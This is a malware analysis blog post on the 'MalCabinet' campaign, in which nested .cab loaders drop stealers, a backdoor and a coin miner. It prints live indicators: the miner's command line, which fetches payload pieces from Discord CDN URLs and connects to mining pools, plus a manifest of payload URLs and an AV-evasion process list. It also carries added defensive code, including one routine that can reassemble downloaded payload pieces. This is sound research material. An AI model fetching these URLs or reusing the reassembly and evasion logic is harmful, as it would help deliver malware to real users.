
MalCabinet Campaign

4 min read · Jan 6, 2024

Malicious Microsoft Cabinet (.cab) files are on the rise these days. They trick users into opening them and then deploy stealers and other payloads.

(Image: the file's icon, viewed in Resource Hacker)

Cabinet files are a standard format for distributing software and patches, so a malicious one looks completely legitimate to open. Please be careful.

I detonated the sample on ANY.RUN to see what happens.

MalCabinet Campaign

The MalCabinet campaign deploys Amadey, AutoIt-based malware, RedLine, assorted loaders, Glupteba, and more.

(Image: Detonation 1)

(Image: Detonation 2)

As you can see, the payload varies from one detonation to the next.

First Loader

The first loader is a Microsoft Cabinet file. Extract it with 7-Zip and you find two binaries.

ck5Ex60.exe is itself another Microsoft Cabinet file, so the loader is a cabinet nested inside a cabinet.

(Image: the extracted files)

(Image: the process trees)
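The nested-cabinet structure above can be checked without handing the sample to an extractor. The following is an added example, not code from the post: a pure-Python reader for the CFHEADER / CFFOLDER / CFFILE tables of the MS-CAB format that lists every member and recurses into members that begin with the MSCF signature. It extracts only uncompressed folders (typeCompress = 0); MSZIP and LZX folders are listed but flagged as not inspected, since those need a real decompressor such as 7-Zip or cabextract. The build_cab helper and the member contents are constructed test data; the member names reuse the ones from this post but the bytes are invented.

```python
import struct

CAB_MAGIC = b"MSCF"
COMPRESS = {0: "none", 1: "MSZIP", 2: "Quantum", 3: "LZX"}


def _cstr(data, off):
    """Read a NUL-terminated string at `off`; return (text, offset past the NUL)."""
    end = data.index(b"\x00", off)
    return data[off:end].decode("latin-1"), end + 1


def parse_cab(data):
    """Parse the CFHEADER, CFFOLDER and CFFILE tables of a cabinet. Nothing is decompressed here."""
    if data[:4] != CAB_MAGIC:
        raise ValueError("missing MSCF signature")
    # reserved1, cbCabinet, reserved2, coffFiles, reserved3, version(2), cFolders, cFiles, flags
    cb_cabinet, coff_files, c_folders, c_files, flags = struct.unpack_from("<4xI4xI4x2xHHH", data, 4)
    off, folder_reserve, data_reserve = 36, 0, 0
    if flags & 0x4:                      # cfhdrRESERVE_PRESENT: per-structure reserve sizes follow
        cb_hdr, folder_reserve, data_reserve = struct.unpack_from("<HBB", data, off)
        off += 4 + cb_hdr
    for _ in range((2 if flags & 0x1 else 0) + (2 if flags & 0x2 else 0)):
        _, off = _cstr(data, off)        # szCabinetPrev/szDiskPrev, szCabinetNext/szDiskNext
    folders = []
    for _ in range(c_folders):
        coff, n_blocks, ctype = struct.unpack_from("<IHH", data, off)
        folders.append({"offset": coff, "blocks": n_blocks, "compress": COMPRESS.get(ctype & 0xF, hex(ctype))})
        off += 8 + folder_reserve
    files, off = [], coff_files
    for _ in range(c_files):
        size, start, ifolder, _date, _time, attribs = struct.unpack_from("<IIHHHH", data, off)
        name, off = _cstr(data, off + 16)
        files.append({"name": name, "size": size, "folder": ifolder, "start": start, "attribs": attribs})
    return {"size": cb_cabinet, "folders": folders, "files": files, "data_reserve": data_reserve}


def _folder_bytes(data, cab, ifolder):
    """Concatenate the CFDATA payloads of one folder. Only uncompressed folders are handled;
    MSZIP/LZX folders return None (use 7-Zip or cabextract for those)."""
    f = cab["folders"][ifolder]
    if f["compress"] != "none":
        return None
    out, off = bytearray(), f["offset"]
    for _ in range(f["blocks"]):
        _csum, cb_data, _cb_uncomp = struct.unpack_from("<IHH", data, off)
        off += 8 + cab["data_reserve"]
        out += data[off:off + cb_data]
        off += cb_data
    return bytes(out)


def extract_file(data, cab, entry):
    blob = _folder_bytes(data, cab, entry["folder"])
    return None if blob is None else blob[entry["start"]:entry["start"] + entry["size"]]


def describe(data, depth=0):
    """List members; recurse into members that are themselves cabinets (the MalCabinet pattern)."""
    cab = parse_cab(data)
    lines = []
    for e in cab["files"]:
        content = extract_file(data, cab, e)
        if content is None:
            tag = " [compressed, not inspected]"
        elif content[:4] == CAB_MAGIC:
            tag = " [nested CAB]"
        else:
            tag = ""
        lines.append("  " * depth + f"{e['name']} {e['size']} bytes{tag}")
        if tag == " [nested CAB]":
            lines += describe(content, depth + 1)
    return lines


def build_cab(members):
    """Build a minimal uncompressed single-folder cabinet from {name: bytes} (constructed test data)."""
    blob, cffiles, start = b"".join(members.values()), b"", 0
    for name, content in members.items():
        cffiles += struct.pack("<IIHHHH", len(content), start, 0, 0, 0, 0x20) + name.encode() + b"\x00"
        start += len(content)
    coff_files = 36 + 8                              # CFHEADER + one CFFOLDER
    coff_data = coff_files + len(cffiles)
    chunks = [blob[i:i + 0x8000] for i in range(0, len(blob), 0x8000)] or [b""]
    cfdata = b"".join(struct.pack("<IHH", 0, len(c), len(c)) + c for c in chunks)
    header = CAB_MAGIC + struct.pack("<IIIIIBBHHHHH", 0, coff_data + len(cfdata), 0, coff_files, 0,
                                     3, 1, 1, len(members), 0, 0x1234, 0)
    return header + struct.pack("<IHH", coff_data, len(chunks), 0) + cffiles + cfdata


if __name__ == "__main__":
    # Constructed stand-in for the two-level loader: an outer .cab carrying an inner .cab and a PE.
    inner = build_cab({"1TD30cg5.exe": b"MZ" + b"A" * 10, "2rv6894.exe": b"MZ" + b"B" * 5})
    outer = build_cab({"ck5Ex60.exe": inner, "7U1tD80.exe": b"MZ" + b"C" * 3})
    print("\n".join(describe(outer)))
```

Running it prints the outer members with ck5Ex60.exe tagged as a nested CAB and its two members indented beneath it. On a real sample most folders are MSZIP or LZX, so the listing alone is what this gives you; the point is that member names and the nesting are visible from the header tables before anything is executed or even extracted.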

1TD30cg5.exe

This binary is AutoIt-compiled, so I recovered its script with AutoIt-Ripper.

https://github.com/nazywam/AutoIt-Ripper

2rv6894.exe

2rv6894.exe is a 7-Zip self-extracting (SFX) archive carrying the backdoor.

Here is the decompressed content. It performs some AV evasion.

It checks for the following AV processes:

  • avastui.exe
  • avgui.exe
  • nswscsvc.exe
  • sophoshealth.exe
  • wrsa.exe

After that, several commands are executed and Random.pif is created.

Random.pif is the AutoIt3 interpreter itself, assembled from the pieces Flexible + Canyon + Breach + Ross + Surround + Float. It is on VirusTotal.

q is the malicious AutoIt script, assembled from Geology + Silent + Guitar.

Here is the BinDiff result comparing the legitimate AutoIt3 interpreter with Random.pif. They are almost identical. I thought Random.pif might be a forked and modified interpreter, but all the malicious logic is in the script file.

Here is the source code of the final decryption routine.

For simplicity, I looked at the detonation.

Here are the files it creates or modifies.

  • C:\Users\admin\AppData\Local\EchoTech Solutions\P is the backdoor (the AutoIt script)
  • C:\Users\admin\AppData\Local\EchoTech Solutions\EchoScan.pif is the same file as Random.pif (the AutoIt3 interpreter)
  • C:\Users\admin\AppData\Local\EchoTech Solutions\EchoScan.js provides persistence by running "C:\Users\admin\AppData\Local\EchoTech Solutions\EchoScan.pif" "C:\Users\admin\AppData\Local\EchoTech Solutions\P"
  • C:\Users\admin\AppData\Local\Temp\7ZipSfx.000\19314\jsc.exe is RisePro
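The persistence chain above (a script host runs a .js, the .js launches a renamed AutoIt3 interpreter with the script as its argument, everything living under AppData) is easy to hunt for in process-creation telemetry. The following is an added example, not part of the post: a small rule set evaluated over Sysmon Event ID 1-shaped records, plus a helper that pulls out the script path to feed to AutoIt-Ripper. The events are constructed; the EchoScan paths follow the post, while the "Random.pif q" launch and the cmd.exe parent are hypothetical.

```python
import ntpath

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
USER_WRITABLE = ("\\appdata\\", "\\programdata\\", "\\temp\\", "\\public\\")


def split_cmdline(cmdline):
    """Minimal Windows command-line tokenizer: honours double quotes, no backslash escaping."""
    tokens, cur, quoted = [], "", False
    for ch in cmdline:
        if ch == '"':
            quoted = not quoted
        elif ch.isspace() and not quoted:
            if cur:
                tokens.append(cur)
                cur = ""
        else:
            cur += ch
    if cur:
        tokens.append(cur)
    return tokens


def evaluate(event):
    """Return the names of the rules one process-creation event trips."""
    image = event["Image"].lower()
    parent = ntpath.basename(event["ParentImage"]).lower()
    args = split_cmdline(event["CommandLine"])
    hits = []
    if image.endswith(".pif") and any(marker in image for marker in USER_WRITABLE):
        hits.append("pif_in_user_writable_dir")           # renamed interpreter dropped by the loader
    if image.endswith(".pif") and len(args) >= 2:
        hits.append("pif_with_script_argument")           # AutoIt3.exe <script>: token 2 is the script
    if image.endswith(".pif") and parent in SCRIPT_HOSTS:
        hits.append("script_host_launches_pif")           # the EchoScan.js persistence hop
    if "\\7zipsfx." in image or "\\7zipsfx." in event["ParentImage"].lower():
        hits.append("spawned_from_7zip_sfx_dir")          # 7-Zip SFX extraction directory in the chain
    return hits


def script_paths(events):
    """For every .pif launch with an argument, return that argument: the file to pull for decompilation."""
    out = []
    for e in events:
        args = split_cmdline(e["CommandLine"])
        if e["Image"].lower().endswith(".pif") and len(args) >= 2:
            out.append(args[1])
    return out


# Constructed events in Sysmon Event ID 1 shape (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\admin\AppData\Local\EchoTech Solutions\EchoScan.pif",
     "CommandLine": r'"C:\Users\admin\AppData\Local\EchoTech Solutions\EchoScan.pif" "C:\Users\admin\AppData\Local\EchoTech Solutions\P"',
     "ParentImage": r"C:\Windows\System32\wscript.exe"},
    {"Image": r"C:\Users\admin\AppData\Local\Temp\7ZipSfx.000\Random.pif",   # hypothetical launch of Random.pif
     "CommandLine": r"Random.pif q",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Program Files (x86)\AutoIt3\AutoIt3.exe",                # benign developer use, should not fire
     "CommandLine": r'"C:\Program Files (x86)\AutoIt3\AutoIt3.exe" C:\tools\build.au3',
     "ParentImage": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        print(ntpath.basename(e["Image"]), "->", evaluate(e) or "clean")
    print("scripts to decompile:", script_paths(SAMPLE_EVENTS))
```

The .pif extension is the signal that matters here: a legitimately installed AutoIt3.exe under Program Files trips nothing, while the same interpreter bytes renamed and dropped into AppData with a script argument trip three rules at once.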

7U1tD80.exe

7U1tD80.exe is a dropper.

RedLine — golden.exe (dropper)

It injects RedLine into RegAsm.exe.

Amadey

7U1tD80.exe dropped C:\Users\admin\AppData\Local\Temp\d887ceb89d\explorhe.exe.

Persistence is established through a scheduled task.

Source: Triage report at https://tria.ge/240105-r89w8sfbb2/static1

nocry.exe

This binary drops many executables and files!

The binary is packed with Enigma.

It is a loader.

The main dropped files are:

  • C:\Users\admin\AppData\Local\Temp\FANBooster131\FANBooster131.exe
  • C:\Users\admin\AppData\Local\Temp\d887ceb89d\FANBooster131.lnk
  • C:\ProgramData\OfficeTrackerNMP131\OfficeTrackerNMP131.exe

It also has a stealer component.

This sets up persistence.

Coinminer uses Discord CDN

It was UPX-packed, so it was unpacked first.

Let's look at the arguments:

C:\Users\admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=uiGheigee2Wuisoh -m=https://cdn.discordapp.com/attachments/1176914652060459101/1177177956087504956/xDYNmhJEPV -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80

The -m= URL serves a manifest that maps a 64-hex-character key (SHA-256-length hash) to a Discord CDN URL for each piece:

  {
    "114d5a4b2915d940bdc913287a2e54ed8aef79bce092c370b1c849842045369c": "https://cdn.discordapp.com/attachments/1176914652060459101/1177177951633149962/fHTPVEp.zip",
    "3d771ccac3b2c7b21016a78d944dfb33c0aad3cb7fa44af7bdf33f39e7ad322b": "https://cdn.discordapp.com/attachments/1176914652060459101/1177177463311310868/IjWPLIVZIspdPDgr.bin.1.part",
    "830afffc7dd32e007736f0d97e8d02f68f80988266e68e3de3250aa189ac8491": "https://cdn.discordapp.com/attachments/1176914652060459101/1177176971462049803/pIoKiczJtyqRd.bin",
    "914facc0b22b640154b9cf433eb1d5fac8696aa7a9b15da2881c4b10f01daffa": "https://cdn.discordapp.com/attachments/1176914652060459101/1177177706736123905/LIFRROD.bin.2.part",
    "920e35e11dca6b01c40707ed5a70c6ef542f4a1da35aab98d541c33ae5d5483f": "https://cdn.discordapp.com/attachments/1176914652060459101/1177177247510188102/tBqtIPGpFvDNsl.bin.0.part",
    "9e4bb6f3dbf7b7769eb308db845eb076de1f384620abbf6de5fe2256ae7c460f": "https://cdn.discordapp.com/attachments/1176914652060459101/1177176748610289695/vJzoO.bin.zip"
  }

The miner downloads the pieces, combines them, and deploys the result as C:\Users\admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe.
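To turn the command line and manifest above into something reusable, here is an added example (not the miner's code and not from the post): it parses the miner arguments into IOC fields and replays the download-verify-join step offline. Two things are assumptions rather than facts from the post: that each manifest key is the SHA-256 of the piece it points at (the keys are 64 hex characters), and that the ".N.part" pieces are concatenated in index order. What the loader does with the -xor= key is not described in the post, so it is only extracted, not applied. The parts, their hashes and the cdn.example URLs are constructed; the command line is the one from the post.

```python
import hashlib
import json
import re

PART_RE = re.compile(r"\.(\d+)\.part$")


def parse_miner_args(cmdline):
    """Pull the IOC-bearing fields out of the miner command line: -xor= key, -m= manifest URL, -pool targets."""
    tokens = cmdline.split()
    info = {"image": tokens[0], "xor_key": None, "manifest": None, "pools": []}
    i = 1
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("-xor="):
            info["xor_key"] = tok[len("-xor="):]
        elif tok.startswith("-m="):
            info["manifest"] = tok[len("-m="):]
        elif tok == "-pool" and i + 1 < len(tokens):
            info["pools"].append(tokens[i + 1])
            i += 1
        i += 1
    return info


def verify_part(expected_sha256, blob):
    """Assumption: the manifest key is the SHA-256 of the downloaded piece."""
    return hashlib.sha256(blob).hexdigest() == expected_sha256.lower()


def reassemble(manifest_json, fetch):
    """Walk a {sha256: url} manifest, fetch every piece, check it against its key, and join the
    '.N.part' pieces in index order (assumption). Returns (joined_bytes, other_members_by_name)."""
    manifest = json.loads(manifest_json)
    parts, others = [], {}
    for expected, url in manifest.items():
        blob = fetch(url)
        if not verify_part(expected, blob):
            raise ValueError(f"hash mismatch for {url}")
        m = PART_RE.search(url)
        if m:
            parts.append((int(m.group(1)), blob))
        else:
            others[url.rsplit("/", 1)[-1]] = blob
    parts.sort(key=lambda p: p[0])
    if [i for i, _ in parts] != list(range(len(parts))):
        raise ValueError("part indices are not contiguous: %r" % [i for i, _ in parts])
    return b"".join(blob for _, blob in parts), others


# Constructed data: three fake pieces plus one archive member, served from a dict instead of the CDN.
DEMO_STORE = {
    "https://cdn.example/att/1/b.bin.1.part": b"PE\x00\x00" + b"\x01" * 4,
    "https://cdn.example/att/1/a.bin.0.part": b"MZ\x90\x00" + b"\x00" * 4,
    "https://cdn.example/att/1/c.bin.2.part": b"\xff" * 8,
    "https://cdn.example/att/1/d.zip": b"PK\x03\x04",
}
DEMO_MANIFEST = json.dumps({hashlib.sha256(v).hexdigest(): k for k, v in DEMO_STORE.items()})

# The command line observed in the post.
SAMPLE_CMDLINE = (r"C:\Users\admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe "
                  "-xor=uiGheigee2Wuisoh "
                  "-m=https://cdn.discordapp.com/attachments/1176914652060459101/1177177956087504956/xDYNmhJEPV "
                  "-pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80")

if __name__ == "__main__":
    print(json.dumps(parse_miner_args(SAMPLE_CMDLINE), indent=2))
    joined, others = reassemble(DEMO_MANIFEST, DEMO_STORE.__getitem__)
    print(len(joined), "bytes reassembled;", sorted(others), "left aside")
```

Pass a real fetcher as `fetch` (for example one that reads previously captured CDN responses from disk) and the same function reconstructs the payload for static analysis; a hash mismatch raises instead of silently joining a tampered or mis-ordered piece, which is also the check you would want before trusting any hash-keyed manifest.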

Conclusion

Stealers, droppers, a coin miner, a backdoor: many malware families shipped in one package. Spreading and initial infection may be the hardest part of cybercrime. 0-day and 1-day exploitation is out of reach for these actors; as you can see from the process tree, it is all a mess. They do not really know how to make an attack go well.

I have not analyzed the malware in more depth yet. I am still researching it.

Stay tuned!


Written by morimolymoly

I am a Security Researcher. Feel free to reach me! Webpage: https://morimolymoly.com/
